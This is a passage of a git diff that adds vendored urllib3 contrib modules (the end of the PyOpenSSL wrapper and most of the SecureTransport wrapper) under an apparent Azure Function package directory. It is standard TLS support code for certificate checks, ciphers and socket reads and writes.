PROTOCOL_TLS_CLIENT: OpenSSL.SSL.SSLv23_METHOD, + ssl.PROTOCOL_TLSv1: OpenSSL.SSL.TLSv1_METHOD, +} + +if hasattr(ssl, "PROTOCOL_SSLv3") and hasattr(OpenSSL.SSL, "SSLv3_METHOD"): + _openssl_versions[ssl.PROTOCOL_SSLv3] = OpenSSL.SSL.SSLv3_METHOD + +if hasattr(ssl, "PROTOCOL_TLSv1_1") and hasattr(OpenSSL.SSL, "TLSv1_1_METHOD"): + _openssl_versions[ssl.PROTOCOL_TLSv1_1] = OpenSSL.SSL.TLSv1_1_METHOD + +if hasattr(ssl, "PROTOCOL_TLSv1_2") and hasattr(OpenSSL.SSL, "TLSv1_2_METHOD"): + _openssl_versions[ssl.PROTOCOL_TLSv1_2] = OpenSSL.SSL.TLSv1_2_METHOD + + +_stdlib_to_openssl_verify = { + ssl.CERT_NONE: OpenSSL.SSL.VERIFY_NONE, + ssl.CERT_OPTIONAL: OpenSSL.SSL.VERIFY_PEER, + ssl.CERT_REQUIRED: OpenSSL.SSL.VERIFY_PEER + + OpenSSL.SSL.VERIFY_FAIL_IF_NO_PEER_CERT, +} +_openssl_to_stdlib_verify = dict((v, k) for k, v in _stdlib_to_openssl_verify.items()) + +# OpenSSL will only write 16K at a time +SSL_WRITE_BLOCKSIZE = 16384 + +orig_util_HAS_SNI = util.HAS_SNI +orig_util_SSLContext = util.ssl_.SSLContext + + +log = logging.getLogger(__name__) + + +def inject_into_urllib3(): + "Monkey-patch urllib3 with PyOpenSSL-backed SSL-support." 
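+    # _validate_dependencies_met() below raises ImportError when the
+    # installed pyOpenSSL or cryptography are too old to provide what we
+    # need.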
+ + _validate_dependencies_met() + + util.SSLContext = PyOpenSSLContext + util.ssl_.SSLContext = PyOpenSSLContext + util.HAS_SNI = HAS_SNI + util.ssl_.HAS_SNI = HAS_SNI + util.IS_PYOPENSSL = True + util.ssl_.IS_PYOPENSSL = True + + +def extract_from_urllib3(): + "Undo monkey-patching by :func:`inject_into_urllib3`." + + util.SSLContext = orig_util_SSLContext + util.ssl_.SSLContext = orig_util_SSLContext + util.HAS_SNI = orig_util_HAS_SNI + util.ssl_.HAS_SNI = orig_util_HAS_SNI + util.IS_PYOPENSSL = False + util.ssl_.IS_PYOPENSSL = False + + +def _validate_dependencies_met(): + """ + Verifies that PyOpenSSL's package-level dependencies have been met. + Throws `ImportError` if they are not met. + """ + # Method added in `cryptography==1.1`; not available in older versions + from cryptography.x509.extensions import Extensions + + if getattr(Extensions, "get_extension_for_class", None) is None: + raise ImportError( + "'cryptography' module missing required functionality. " + "Try upgrading to v1.3.4 or newer." + ) + + # pyOpenSSL 0.14 and above use cryptography for OpenSSL bindings. The _x509 + # attribute is only present on those versions. + from OpenSSL.crypto import X509 + + x509 = X509() + if getattr(x509, "_x509", None) is None: + raise ImportError( + "'pyOpenSSL' module missing required functionality. " + "Try upgrading to v0.14 or newer." + ) + + +def _dnsname_to_stdlib(name): + """ + Converts a dNSName SubjectAlternativeName field to the form used by the + standard library on the given Python version. + + Cryptography produces a dNSName as a unicode string that was idna-decoded + from ASCII bytes. We need to idna-encode that string to get it back, and + then on Python 3 we also need to convert to unicode via UTF-8 (the stdlib + uses PyUnicode_FromStringAndSize on it, which decodes via UTF-8). + + If the name cannot be idna-encoded then we return None signalling that + the name given should be skipped. + """ + + def idna_encode(name): + """ + Borrowed wholesale from the Python Cryptography Project. It turns out + that we can't just safely call `idna.encode`: it can explode for + wildcard names. This avoids that problem. + """ + import idna + + try: + for prefix in [u"*.", u"."]: + if name.startswith(prefix): + name = name[len(prefix) :] + return prefix.encode("ascii") + idna.encode(name) + return idna.encode(name) + except idna.core.IDNAError: + return None + + # Don't send IPv6 addresses through the IDNA encoder. + if ":" in name: + return name + + name = idna_encode(name) + if name is None: + return None + elif sys.version_info >= (3, 0): + name = name.decode("utf-8") + return name + + +def get_subj_alt_name(peer_cert): + """ + Given an PyOpenSSL certificate, provides all the subject alternative names. + """ + # Pass the cert to cryptography, which has much better APIs for this. + if hasattr(peer_cert, "to_cryptography"): + cert = peer_cert.to_cryptography() + else: + # This is technically using private APIs, but should work across all + # relevant versions before PyOpenSSL got a proper API for this. + cert = _Certificate(openssl_backend, peer_cert._x509) + + # We want to find the SAN extension. Ask Cryptography to locate it (it's + # faster than looping in Python) + try: + ext = cert.extensions.get_extension_for_class(x509.SubjectAlternativeName).value + except x509.ExtensionNotFound: + # No such extension, return the empty list. 
+ return [] + except ( + x509.DuplicateExtension, + UnsupportedExtension, + x509.UnsupportedGeneralNameType, + UnicodeError, + ) as e: + # A problem has been found with the quality of the certificate. Assume + # no SAN field is present. + log.warning( + "A problem was encountered with the certificate that prevented " + "urllib3 from finding the SubjectAlternativeName field. This can " + "affect certificate validation. The error was %s", + e, + ) + return [] + + # We want to return dNSName and iPAddress fields. We need to cast the IPs + # back to strings because the match_hostname function wants them as + # strings. + # Sadly the DNS names need to be idna encoded and then, on Python 3, UTF-8 + # decoded. This is pretty frustrating, but that's what the standard library + # does with certificates, and so we need to attempt to do the same. + # We also want to skip over names which cannot be idna encoded. + names = [ + ("DNS", name) + for name in map(_dnsname_to_stdlib, ext.get_values_for_type(x509.DNSName)) + if name is not None + ] + names.extend( + ("IP Address", str(name)) for name in ext.get_values_for_type(x509.IPAddress) + ) + + return names + + +class WrappedSocket(object): + """API-compatibility wrapper for Python OpenSSL's Connection-class. + + Note: _makefile_refs, _drop() and _reuse() are needed for the garbage + collector of pypy. + """ + + def __init__(self, connection, socket, suppress_ragged_eofs=True): + self.connection = connection + self.socket = socket + self.suppress_ragged_eofs = suppress_ragged_eofs + self._makefile_refs = 0 + self._closed = False + + def fileno(self): + return self.socket.fileno() + + # Copy-pasted from Python 3.5 source code + def _decref_socketios(self): + if self._makefile_refs > 0: + self._makefile_refs -= 1 + if self._closed: + self.close() + + def recv(self, *args, **kwargs): + try: + data = self.connection.recv(*args, **kwargs) + except OpenSSL.SSL.SysCallError as e: + if self.suppress_ragged_eofs and e.args == (-1, "Unexpected EOF"): + return b"" + else: + raise SocketError(str(e)) + except OpenSSL.SSL.ZeroReturnError: + if self.connection.get_shutdown() == OpenSSL.SSL.RECEIVED_SHUTDOWN: + return b"" + else: + raise + except OpenSSL.SSL.WantReadError: + if not util.wait_for_read(self.socket, self.socket.gettimeout()): + raise timeout("The read operation timed out") + else: + return self.recv(*args, **kwargs) + + # TLS 1.3 post-handshake authentication + except OpenSSL.SSL.Error as e: + raise ssl.SSLError("read error: %r" % e) + else: + return data + + def recv_into(self, *args, **kwargs): + try: + return self.connection.recv_into(*args, **kwargs) + except OpenSSL.SSL.SysCallError as e: + if self.suppress_ragged_eofs and e.args == (-1, "Unexpected EOF"): + return 0 + else: + raise SocketError(str(e)) + except OpenSSL.SSL.ZeroReturnError: + if self.connection.get_shutdown() == OpenSSL.SSL.RECEIVED_SHUTDOWN: + return 0 + else: + raise + except OpenSSL.SSL.WantReadError: + if not util.wait_for_read(self.socket, self.socket.gettimeout()): + raise timeout("The read operation timed out") + else: + return self.recv_into(*args, **kwargs) + + # TLS 1.3 post-handshake authentication + except OpenSSL.SSL.Error as e: + raise ssl.SSLError("read error: %r" % e) + + def settimeout(self, timeout): + return self.socket.settimeout(timeout) + + def _send_until_done(self, data): + while True: + try: + return self.connection.send(data) + except OpenSSL.SSL.WantWriteError: + if not util.wait_for_write(self.socket, self.socket.gettimeout()): + raise timeout() + continue 
+ except OpenSSL.SSL.SysCallError as e: + raise SocketError(str(e)) + + def sendall(self, data): + total_sent = 0 + while total_sent < len(data): + sent = self._send_until_done( + data[total_sent : total_sent + SSL_WRITE_BLOCKSIZE] + ) + total_sent += sent + + def shutdown(self): + # FIXME rethrow compatible exceptions should we ever use this + self.connection.shutdown() + + def close(self): + if self._makefile_refs < 1: + try: + self._closed = True + return self.connection.close() + except OpenSSL.SSL.Error: + return + else: + self._makefile_refs -= 1 + + def getpeercert(self, binary_form=False): + x509 = self.connection.get_peer_certificate() + + if not x509: + return x509 + + if binary_form: + return OpenSSL.crypto.dump_certificate(OpenSSL.crypto.FILETYPE_ASN1, x509) + + return { + "subject": ((("commonName", x509.get_subject().CN),),), + "subjectAltName": get_subj_alt_name(x509), + } + + def version(self): + return self.connection.get_protocol_version_name() + + def _reuse(self): + self._makefile_refs += 1 + + def _drop(self): + if self._makefile_refs < 1: + self.close() + else: + self._makefile_refs -= 1 + + +if _fileobject: # Platform-specific: Python 2 + + def makefile(self, mode, bufsize=-1): + self._makefile_refs += 1 + return _fileobject(self, mode, bufsize, close=True) + + +else: # Platform-specific: Python 3 + makefile = backport_makefile + +WrappedSocket.makefile = makefile + + +class PyOpenSSLContext(object): + """ + I am a wrapper class for the PyOpenSSL ``Context`` object. I am responsible + for translating the interface of the standard library ``SSLContext`` object + to calls into PyOpenSSL. + """ + + def __init__(self, protocol): + self.protocol = _openssl_versions[protocol] + self._ctx = OpenSSL.SSL.Context(self.protocol) + self._options = 0 + self.check_hostname = False + + @property + def options(self): + return self._options + + @options.setter + def options(self, value): + self._options = value + self._ctx.set_options(value) + + @property + def verify_mode(self): + return _openssl_to_stdlib_verify[self._ctx.get_verify_mode()] + + @verify_mode.setter + def verify_mode(self, value): + self._ctx.set_verify(_stdlib_to_openssl_verify[value], _verify_callback) + + def set_default_verify_paths(self): + self._ctx.set_default_verify_paths() + + def set_ciphers(self, ciphers): + if isinstance(ciphers, six.text_type): + ciphers = ciphers.encode("utf-8") + self._ctx.set_cipher_list(ciphers) + + def load_verify_locations(self, cafile=None, capath=None, cadata=None): + if cafile is not None: + cafile = cafile.encode("utf-8") + if capath is not None: + capath = capath.encode("utf-8") + try: + self._ctx.load_verify_locations(cafile, capath) + if cadata is not None: + self._ctx.load_verify_locations(BytesIO(cadata)) + except OpenSSL.SSL.Error as e: + raise ssl.SSLError("unable to load trusted certificates: %r" % e) + + def load_cert_chain(self, certfile, keyfile=None, password=None): + self._ctx.use_certificate_chain_file(certfile) + if password is not None: + if not isinstance(password, six.binary_type): + password = password.encode("utf-8") + self._ctx.set_passwd_cb(lambda *_: password) + self._ctx.use_privatekey_file(keyfile or certfile) + + def set_alpn_protocols(self, protocols): + protocols = [six.ensure_binary(p) for p in protocols] + return self._ctx.set_alpn_protos(protocols) + + def wrap_socket( + self, + sock, + server_side=False, + do_handshake_on_connect=True, + suppress_ragged_eofs=True, + server_hostname=None, + ): + cnx = OpenSSL.SSL.Connection(self._ctx, sock) + + if 
isinstance(server_hostname, six.text_type):  # Platform-specific: Python 3
+            server_hostname = server_hostname.encode("utf-8")
+
+        if server_hostname is not None:
+            cnx.set_tlsext_host_name(server_hostname)
+
+        cnx.set_connect_state()
+
+        while True:
+            try:
+                cnx.do_handshake()
+            except OpenSSL.SSL.WantReadError:
+                if not util.wait_for_read(sock, sock.gettimeout()):
+                    raise timeout("select timed out")
+                continue
+            except OpenSSL.SSL.Error as e:
+                raise ssl.SSLError("bad handshake: %r" % e)
+            break
+
+        return WrappedSocket(cnx, sock)
+
+
+def _verify_callback(cnx, x509, err_no, err_depth, return_code):
+    return err_no == 0
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/securetransport.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/securetransport.py
new file mode 100644
index 0000000..7d5f1b8
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/securetransport.py
@@ -0,0 +1,922 @@
+"""
+SecureTransport support for urllib3 via ctypes.
+
+This makes platform-native TLS available to urllib3 users on macOS without the
+use of a compiler. This is an important feature because the Python Package
+Index is moving to become a TLSv1.2-or-higher server, and the default OpenSSL
+that ships with macOS is not capable of doing TLSv1.2. The only way to resolve
+this is to give macOS users an alternative solution to the problem, and that
+solution is to use SecureTransport.
+
+We use ctypes here because this solution must not require a compiler. That's
+because pip is not allowed to require a compiler either.
+
+This is not intended to be a seriously long-term solution to this problem.
+The hope is that PEP 543 will eventually solve this issue for us, at which
+point we can retire this contrib module. But in the short term, we need to
+solve the impending tire fire that is Python on Mac without this kind of
+contrib module. So...here we are.
+
+To use this module, simply import and inject it::
+
+    import urllib3.contrib.securetransport
+    urllib3.contrib.securetransport.inject_into_urllib3()
+
+Happy TLSing!
+
+This code is a bastardised version of the code found in Will Bond's oscrypto
+library. An enormous debt is owed to him for blazing this trail for us. For
+that reason, this code should be considered to be covered both by urllib3's
+license and by oscrypto's:
+
+.. code-block::
+
+    Copyright (c) 2015-2016 Will Bond
+
+    Permission is hereby granted, free of charge, to any person obtaining a
+    copy of this software and associated documentation files (the "Software"),
+    to deal in the Software without restriction, including without limitation
+    the rights to use, copy, modify, merge, publish, distribute, sublicense,
+    and/or sell copies of the Software, and to permit persons to whom the
+    Software is furnished to do so, subject to the following conditions:
+
+    The above copyright notice and this permission notice shall be included in
+    all copies or substantial portions of the Software.
+
+    THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+    IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+    FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE + AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING + FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER + DEALINGS IN THE SOFTWARE. +""" +from __future__ import absolute_import + +import contextlib +import ctypes +import errno +import os.path +import shutil +import socket +import ssl +import struct +import threading +import weakref + +import six + +from .. import util +from ..util.ssl_ import PROTOCOL_TLS_CLIENT +from ._securetransport.bindings import CoreFoundation, Security, SecurityConst +from ._securetransport.low_level import ( + _assert_no_error, + _build_tls_unknown_ca_alert, + _cert_array_from_pem, + _create_cfstring_array, + _load_client_cert_chain, + _temporary_keychain, +) + +try: # Platform-specific: Python 2 + from socket import _fileobject +except ImportError: # Platform-specific: Python 3 + _fileobject = None + from ..packages.backports.makefile import backport_makefile + +__all__ = ["inject_into_urllib3", "extract_from_urllib3"] + +# SNI always works +HAS_SNI = True + +orig_util_HAS_SNI = util.HAS_SNI +orig_util_SSLContext = util.ssl_.SSLContext + +# This dictionary is used by the read callback to obtain a handle to the +# calling wrapped socket. This is a pretty silly approach, but for now it'll +# do. I feel like I should be able to smuggle a handle to the wrapped socket +# directly in the SSLConnectionRef, but for now this approach will work I +# guess. +# +# We need to lock around this structure for inserts, but we don't do it for +# reads/writes in the callbacks. The reasoning here goes as follows: +# +# 1. It is not possible to call into the callbacks before the dictionary is +# populated, so once in the callback the id must be in the dictionary. +# 2. The callbacks don't mutate the dictionary, they only read from it, and +# so cannot conflict with any of the insertions. +# +# This is good: if we had to lock in the callbacks we'd drastically slow down +# the performance of this code. +_connection_refs = weakref.WeakValueDictionary() +_connection_ref_lock = threading.Lock() + +# Limit writes to 16kB. This is OpenSSL's limit, but we'll cargo-cult it over +# for no better reason than we need *a* limit, and this one is right there. +SSL_WRITE_BLOCKSIZE = 16384 + +# This is our equivalent of util.ssl_.DEFAULT_CIPHERS, but expanded out to +# individual cipher suites. We need to do this because this is how +# SecureTransport wants them. 
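+# As a sanity check, each name below maps back to its IANA codepoint, e.g.
+# hex(SecurityConst.TLS_AES_128_GCM_SHA256) == "0x1301".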
+CIPHER_SUITES = [ + SecurityConst.TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384, + SecurityConst.TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256, + SecurityConst.TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384, + SecurityConst.TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256, + SecurityConst.TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256, + SecurityConst.TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256, + SecurityConst.TLS_DHE_RSA_WITH_AES_256_GCM_SHA384, + SecurityConst.TLS_DHE_RSA_WITH_AES_128_GCM_SHA256, + SecurityConst.TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384, + SecurityConst.TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA, + SecurityConst.TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256, + SecurityConst.TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA, + SecurityConst.TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384, + SecurityConst.TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA, + SecurityConst.TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256, + SecurityConst.TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA, + SecurityConst.TLS_DHE_RSA_WITH_AES_256_CBC_SHA256, + SecurityConst.TLS_DHE_RSA_WITH_AES_256_CBC_SHA, + SecurityConst.TLS_DHE_RSA_WITH_AES_128_CBC_SHA256, + SecurityConst.TLS_DHE_RSA_WITH_AES_128_CBC_SHA, + SecurityConst.TLS_AES_256_GCM_SHA384, + SecurityConst.TLS_AES_128_GCM_SHA256, + SecurityConst.TLS_RSA_WITH_AES_256_GCM_SHA384, + SecurityConst.TLS_RSA_WITH_AES_128_GCM_SHA256, + SecurityConst.TLS_AES_128_CCM_8_SHA256, + SecurityConst.TLS_AES_128_CCM_SHA256, + SecurityConst.TLS_RSA_WITH_AES_256_CBC_SHA256, + SecurityConst.TLS_RSA_WITH_AES_128_CBC_SHA256, + SecurityConst.TLS_RSA_WITH_AES_256_CBC_SHA, + SecurityConst.TLS_RSA_WITH_AES_128_CBC_SHA, +] + +# Basically this is simple: for PROTOCOL_SSLv23 we turn it into a low of +# TLSv1 and a high of TLSv1.2. For everything else, we pin to that version. +# TLSv1 to 1.2 are supported on macOS 10.8+ +_protocol_to_min_max = { + util.PROTOCOL_TLS: (SecurityConst.kTLSProtocol1, SecurityConst.kTLSProtocol12), + PROTOCOL_TLS_CLIENT: (SecurityConst.kTLSProtocol1, SecurityConst.kTLSProtocol12), +} + +if hasattr(ssl, "PROTOCOL_SSLv2"): + _protocol_to_min_max[ssl.PROTOCOL_SSLv2] = ( + SecurityConst.kSSLProtocol2, + SecurityConst.kSSLProtocol2, + ) +if hasattr(ssl, "PROTOCOL_SSLv3"): + _protocol_to_min_max[ssl.PROTOCOL_SSLv3] = ( + SecurityConst.kSSLProtocol3, + SecurityConst.kSSLProtocol3, + ) +if hasattr(ssl, "PROTOCOL_TLSv1"): + _protocol_to_min_max[ssl.PROTOCOL_TLSv1] = ( + SecurityConst.kTLSProtocol1, + SecurityConst.kTLSProtocol1, + ) +if hasattr(ssl, "PROTOCOL_TLSv1_1"): + _protocol_to_min_max[ssl.PROTOCOL_TLSv1_1] = ( + SecurityConst.kTLSProtocol11, + SecurityConst.kTLSProtocol11, + ) +if hasattr(ssl, "PROTOCOL_TLSv1_2"): + _protocol_to_min_max[ssl.PROTOCOL_TLSv1_2] = ( + SecurityConst.kTLSProtocol12, + SecurityConst.kTLSProtocol12, + ) + + +def inject_into_urllib3(): + """ + Monkey-patch urllib3 with SecureTransport-backed SSL-support. + """ + util.SSLContext = SecureTransportContext + util.ssl_.SSLContext = SecureTransportContext + util.HAS_SNI = HAS_SNI + util.ssl_.HAS_SNI = HAS_SNI + util.IS_SECURETRANSPORT = True + util.ssl_.IS_SECURETRANSPORT = True + + +def extract_from_urllib3(): + """ + Undo monkey-patching by :func:`inject_into_urllib3`. + """ + util.SSLContext = orig_util_SSLContext + util.ssl_.SSLContext = orig_util_SSLContext + util.HAS_SNI = orig_util_HAS_SNI + util.ssl_.HAS_SNI = orig_util_HAS_SNI + util.IS_SECURETRANSPORT = False + util.ssl_.IS_SECURETRANSPORT = False + + +def _read_callback(connection_id, data_buffer, data_length_pointer): + """ + SecureTransport read callback. 
This is called by ST to request that data + be returned from the socket. + """ + wrapped_socket = None + try: + wrapped_socket = _connection_refs.get(connection_id) + if wrapped_socket is None: + return SecurityConst.errSSLInternal + base_socket = wrapped_socket.socket + + requested_length = data_length_pointer[0] + + timeout = wrapped_socket.gettimeout() + error = None + read_count = 0 + + try: + while read_count < requested_length: + if timeout is None or timeout >= 0: + if not util.wait_for_read(base_socket, timeout): + raise socket.error(errno.EAGAIN, "timed out") + + remaining = requested_length - read_count + buffer = (ctypes.c_char * remaining).from_address( + data_buffer + read_count + ) + chunk_size = base_socket.recv_into(buffer, remaining) + read_count += chunk_size + if not chunk_size: + if not read_count: + return SecurityConst.errSSLClosedGraceful + break + except (socket.error) as e: + error = e.errno + + if error is not None and error != errno.EAGAIN: + data_length_pointer[0] = read_count + if error == errno.ECONNRESET or error == errno.EPIPE: + return SecurityConst.errSSLClosedAbort + raise + + data_length_pointer[0] = read_count + + if read_count != requested_length: + return SecurityConst.errSSLWouldBlock + + return 0 + except Exception as e: + if wrapped_socket is not None: + wrapped_socket._exception = e + return SecurityConst.errSSLInternal + + +def _write_callback(connection_id, data_buffer, data_length_pointer): + """ + SecureTransport write callback. This is called by ST to request that data + actually be sent on the network. + """ + wrapped_socket = None + try: + wrapped_socket = _connection_refs.get(connection_id) + if wrapped_socket is None: + return SecurityConst.errSSLInternal + base_socket = wrapped_socket.socket + + bytes_to_write = data_length_pointer[0] + data = ctypes.string_at(data_buffer, bytes_to_write) + + timeout = wrapped_socket.gettimeout() + error = None + sent = 0 + + try: + while sent < bytes_to_write: + if timeout is None or timeout >= 0: + if not util.wait_for_write(base_socket, timeout): + raise socket.error(errno.EAGAIN, "timed out") + chunk_sent = base_socket.send(data) + sent += chunk_sent + + # This has some needless copying here, but I'm not sure there's + # much value in optimising this data path. + data = data[chunk_sent:] + except (socket.error) as e: + error = e.errno + + if error is not None and error != errno.EAGAIN: + data_length_pointer[0] = sent + if error == errno.ECONNRESET or error == errno.EPIPE: + return SecurityConst.errSSLClosedAbort + raise + + data_length_pointer[0] = sent + + if sent != bytes_to_write: + return SecurityConst.errSSLWouldBlock + + return 0 + except Exception as e: + if wrapped_socket is not None: + wrapped_socket._exception = e + return SecurityConst.errSSLInternal + + +# We need to keep these two objects references alive: if they get GC'd while +# in use then SecureTransport could attempt to call a function that is in freed +# memory. That would be...uh...bad. Yeah, that's the word. Bad. +_read_callback_pointer = Security.SSLReadFunc(_read_callback) +_write_callback_pointer = Security.SSLWriteFunc(_write_callback) + + +class WrappedSocket(object): + """ + API-compatibility wrapper for Python's OpenSSL wrapped socket object. + + Note: _makefile_refs, _drop(), and _reuse() are needed for the garbage + collector of PyPy. 
+    """
+
+    def __init__(self, socket):
+        self.socket = socket
+        self.context = None
+        self._makefile_refs = 0
+        self._closed = False
+        self._exception = None
+        self._keychain = None
+        self._keychain_dir = None
+        self._client_cert_chain = None
+
+        # We save off the previously-configured timeout and then set it to
+        # zero. This is done because we use select and friends to handle the
+        # timeouts, but if we leave the timeout set on the lower socket then
+        # Python will "kindly" call select on that socket again for us. Avoid
+        # that by forcing the timeout to zero.
+        self._timeout = self.socket.gettimeout()
+        self.socket.settimeout(0)
+
+    @contextlib.contextmanager
+    def _raise_on_error(self):
+        """
+        A context manager that can be used to wrap calls that do I/O from
+        SecureTransport. If any of the I/O callbacks hit an exception, this
+        context manager will correctly propagate the exception after the fact.
+        This avoids silently swallowing those exceptions.
+
+        It also correctly forces the socket closed.
+        """
+        self._exception = None
+
+        # We explicitly don't catch around this yield because in the unlikely
+        # event that an exception was hit in the block we don't want to swallow
+        # it.
+        yield
+        if self._exception is not None:
+            exception, self._exception = self._exception, None
+            self.close()
+            raise exception
+
+    def _set_ciphers(self):
+        """
+        Sets up the allowed ciphers. By default this matches the set in
+        util.ssl_.DEFAULT_CIPHERS, at least as supported by macOS. This is done
+        by hand and doesn't allow changing at this time, mostly because parsing
+        OpenSSL cipher strings is going to be a freaking nightmare.
+        """
+        ciphers = (Security.SSLCipherSuite * len(CIPHER_SUITES))(*CIPHER_SUITES)
+        result = Security.SSLSetEnabledCiphers(
+            self.context, ciphers, len(CIPHER_SUITES)
+        )
+        _assert_no_error(result)
+
+    def _set_alpn_protocols(self, protocols):
+        """
+        Sets up the ALPN protocols on the context.
+        """
+        if not protocols:
+            return
+        protocols_arr = _create_cfstring_array(protocols)
+        try:
+            result = Security.SSLSetALPNProtocols(self.context, protocols_arr)
+            _assert_no_error(result)
+        finally:
+            CoreFoundation.CFRelease(protocols_arr)
+
+    def _custom_validate(self, verify, trust_bundle):
+        """
+        Called when we have set custom validation. We do this in two cases:
+        first, when cert validation is entirely disabled; and second, when
+        using a custom trust DB.
+        Raises an SSLError if the connection is not trusted.
+        """
+        # If we disabled cert validation, just say: cool.
+        if not verify:
+            return
+
+        successes = (
+            SecurityConst.kSecTrustResultUnspecified,
+            SecurityConst.kSecTrustResultProceed,
+        )
+        try:
+            trust_result = self._evaluate_trust(trust_bundle)
+            if trust_result in successes:
+                return
+            reason = "error code: %d" % (trust_result,)
+        except Exception as e:
+            # Do not trust on error
+            reason = "exception: %r" % (e,)
+
+        # SecureTransport does not send an alert nor shut down the connection.
+        rec = _build_tls_unknown_ca_alert(self.version())
+        self.socket.sendall(rec)
+        # close the connection immediately
+        # l_onoff = 1, activate linger
+        # l_linger = 0, linger for 0 seconds
+        opts = struct.pack("ii", 1, 0)
+        self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, opts)
+        self.close()
+        raise ssl.SSLError("certificate verify failed, %s" % reason)
+
+    def _evaluate_trust(self, trust_bundle):
+        # We want data in memory, so load it up.
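+        # Editor's note: trust_bundle may be either a filesystem path to a
+        # CA file (the cafile case) or in-memory PEM/DER bytes (the cadata
+        # case); the isfile() check below normalises both forms to raw bytes
+        # before parsing.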
+ if os.path.isfile(trust_bundle): + with open(trust_bundle, "rb") as f: + trust_bundle = f.read() + + cert_array = None + trust = Security.SecTrustRef() + + try: + # Get a CFArray that contains the certs we want. + cert_array = _cert_array_from_pem(trust_bundle) + + # Ok, now the hard part. We want to get the SecTrustRef that ST has + # created for this connection, shove our CAs into it, tell ST to + # ignore everything else it knows, and then ask if it can build a + # chain. This is a buuuunch of code. + result = Security.SSLCopyPeerTrust(self.context, ctypes.byref(trust)) + _assert_no_error(result) + if not trust: + raise ssl.SSLError("Failed to copy trust reference") + + result = Security.SecTrustSetAnchorCertificates(trust, cert_array) + _assert_no_error(result) + + result = Security.SecTrustSetAnchorCertificatesOnly(trust, True) + _assert_no_error(result) + + trust_result = Security.SecTrustResultType() + result = Security.SecTrustEvaluate(trust, ctypes.byref(trust_result)) + _assert_no_error(result) + finally: + if trust: + CoreFoundation.CFRelease(trust) + + if cert_array is not None: + CoreFoundation.CFRelease(cert_array) + + return trust_result.value + + def handshake( + self, + server_hostname, + verify, + trust_bundle, + min_version, + max_version, + client_cert, + client_key, + client_key_passphrase, + alpn_protocols, + ): + """ + Actually performs the TLS handshake. This is run automatically by + wrapped socket, and shouldn't be needed in user code. + """ + # First, we do the initial bits of connection setup. We need to create + # a context, set its I/O funcs, and set the connection reference. + self.context = Security.SSLCreateContext( + None, SecurityConst.kSSLClientSide, SecurityConst.kSSLStreamType + ) + result = Security.SSLSetIOFuncs( + self.context, _read_callback_pointer, _write_callback_pointer + ) + _assert_no_error(result) + + # Here we need to compute the handle to use. We do this by taking the + # id of self modulo 2**31 - 1. If this is already in the dictionary, we + # just keep incrementing by one until we find a free space. + with _connection_ref_lock: + handle = id(self) % 2147483647 + while handle in _connection_refs: + handle = (handle + 1) % 2147483647 + _connection_refs[handle] = self + + result = Security.SSLSetConnection(self.context, handle) + _assert_no_error(result) + + # If we have a server hostname, we should set that too. + if server_hostname: + if not isinstance(server_hostname, bytes): + server_hostname = server_hostname.encode("utf-8") + + result = Security.SSLSetPeerDomainName( + self.context, server_hostname, len(server_hostname) + ) + _assert_no_error(result) + + # Setup the ciphers. + self._set_ciphers() + + # Setup the ALPN protocols. + self._set_alpn_protocols(alpn_protocols) + + # Set the minimum and maximum TLS versions. + result = Security.SSLSetProtocolVersionMin(self.context, min_version) + _assert_no_error(result) + + result = Security.SSLSetProtocolVersionMax(self.context, max_version) + _assert_no_error(result) + + # If there's a trust DB, we need to use it. We do that by telling + # SecureTransport to break on server auth. We also do that if we don't + # want to validate the certs at all: we just won't actually do any + # authing in that case. + if not verify or trust_bundle is not None: + result = Security.SSLSetSessionOption( + self.context, SecurityConst.kSSLSessionOptionBreakOnServerAuth, True + ) + _assert_no_error(result) + + # If there's a client cert, we need to use it. 
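+        # Editor's note: SecureTransport can only consume client identities
+        # from a keychain, not from PEM files directly, so the cert/key pair
+        # is imported into a throwaway keychain here and deleted again in
+        # close().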
+ if client_cert: + self._keychain, self._keychain_dir = _temporary_keychain() + self._client_cert_chain = _load_client_cert_chain( + self._keychain, client_cert, client_key + ) + result = Security.SSLSetCertificate(self.context, self._client_cert_chain) + _assert_no_error(result) + + while True: + with self._raise_on_error(): + result = Security.SSLHandshake(self.context) + + if result == SecurityConst.errSSLWouldBlock: + raise socket.timeout("handshake timed out") + elif result == SecurityConst.errSSLServerAuthCompleted: + self._custom_validate(verify, trust_bundle) + continue + else: + _assert_no_error(result) + break + + def fileno(self): + return self.socket.fileno() + + # Copy-pasted from Python 3.5 source code + def _decref_socketios(self): + if self._makefile_refs > 0: + self._makefile_refs -= 1 + if self._closed: + self.close() + + def recv(self, bufsiz): + buffer = ctypes.create_string_buffer(bufsiz) + bytes_read = self.recv_into(buffer, bufsiz) + data = buffer[:bytes_read] + return data + + def recv_into(self, buffer, nbytes=None): + # Read short on EOF. + if self._closed: + return 0 + + if nbytes is None: + nbytes = len(buffer) + + buffer = (ctypes.c_char * nbytes).from_buffer(buffer) + processed_bytes = ctypes.c_size_t(0) + + with self._raise_on_error(): + 